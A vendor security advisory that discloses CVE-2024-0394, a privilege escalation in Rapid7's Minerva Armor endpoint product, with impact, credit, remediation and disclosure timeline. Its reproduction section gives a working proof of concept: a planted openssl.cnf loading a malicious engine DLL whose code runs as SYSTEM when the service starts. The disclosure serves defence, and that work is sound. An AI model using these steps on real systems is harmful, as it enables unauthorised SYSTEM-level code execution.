Last updated at Fri, 05 Apr 2024 20:45:32 GMT
Rapid7 is disclosing CVE-2024-0394, a privilege escalation vulnerability in Rapid7 Minerva’s Armor product family. Minerva uses the open-source OpenSSL library for cryptographic functions and to support secure communications. The root cause of this vulnerability is Minerva’s implementation of OpenSSL’s OPENSSLDIR parameter, which was set to a path accessible to low-privileged users (such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf). Rapid7 has assessed this vulnerability as having a CVSSv3 score of 7.8.
Impact
Since Minerva Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged attacker can create an openssl.cnf configuration file to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.
Credit
Rapid7 would like to thank Will Dormann of Vul Labs for disclosing this vulnerability to us in accordance with Rapid7's vulnerability disclosure policy. We are grateful to Will and the security research community for their work to make software and systems safer for everyone.
Product Description
Minerva Armor technology is a core endpoint security component (Windows only) aimed at preventing evasive malware, ransomware, and advanced cyber attacks. Armor is operated and trusted by SMBs and enterprise organizations around the world across a diversity of sectors and verticals.
Minerva Armor technology was developed by Minerva Labs, which was acquired by Rapid7 in March 2023. Armor is part of a product family that includes Minerva Armor and Rapid7 next-generation antivirus (NGAV). Armor was previously used as an OEM component in Intego AV. Note: The Insight agent is not vulnerable to this issue.
Exploitation
During the Armor 32-bit service startup (MVArmorService32.exe), Armor loads the OpenSSL library. OpenSSL is a library that provides a variety of cryptographic functions. This library has an internal directory tree that is used to locate the configuration file; this directory is called OPENSSLDIR. Inside OPENSSLDIR resides the configuration file openssl.cnf. This is where the privilege escalation opportunity begins.
When the application is dependent on the OpenSSL library, it is necessary to indicate the full path to OPENSSLDIR at compile-time, but at run-time, this path is not necessary. Therefore, it is possible to discover the full path using reverse engineering techniques and tools, such as strings, ProcMon, and others.
If an attacker can place the openssl.cnf file and specify a malicious library for loading, the attacker's code is executed instead. The root cause of this vulnerability lies in the OpenSSL library’s configuration in Minerva, where the OPENSSLDIR parameter was set to a path accessible to low-privileged users, such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf. Since Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged user can create the openssl.cnf configuration file mentioned above to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.
Below is a ProcMon capture of the Armor service looking for the openssl.cnf file:
Steps To Reproduce
All steps are executed as a low-privileged authenticated user:
- Create a “C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static” directory:
mkdir “C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static” - Create an
.cnf filewith the following contents:
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\danik\\calc.dll
init = 0
- Create the c:\danik folder:
mkdir “C:\danik” - Compile and link a malicious “OpenSSL library” — the code below will run Windows calculator:
#include <windows.h>
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
system("calc");
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}
- Copy
calc.dllfrom above to the “C:\danik” directory. - Restart the Armor service or the whole machine.
Remediation
To remediate CVE-2024-0394, Minerva customers should update the latest release:
| Customers | Remediated version |
|---|---|
| Minerva customers | Armor version 4.5.5 |
| Minerva Armor OEM customers | Armor OEM version 4.5.5 |
Disclosure Timeline
January 8, 2024: Issue reported to Rapid7 by Will Dormann of Vul Labs
January 9, 2024: Rapid7 acknowledges report
January 11, 2024: Rapid7 reproduces issue, confirms vulnerability
January - February 2024: Rapid7 engineering team develops and tests fix, requests information from partner on potentially vulnerable implementation; partner confirms they are no longer offering vulnerable implementation.
March 12, 2024: Rapid7 contacts reporter to ask whether our fix timeline had been previously communicated
March 19, 2024: Rapid7 assigns CVE, updates reporter on fix readiness, confirms affected/fixed versions. Rapid7 and reporter agree on April 3, 2024 as a coordinated disclosure date.
April 3, 2024: This disclosure; fix released.
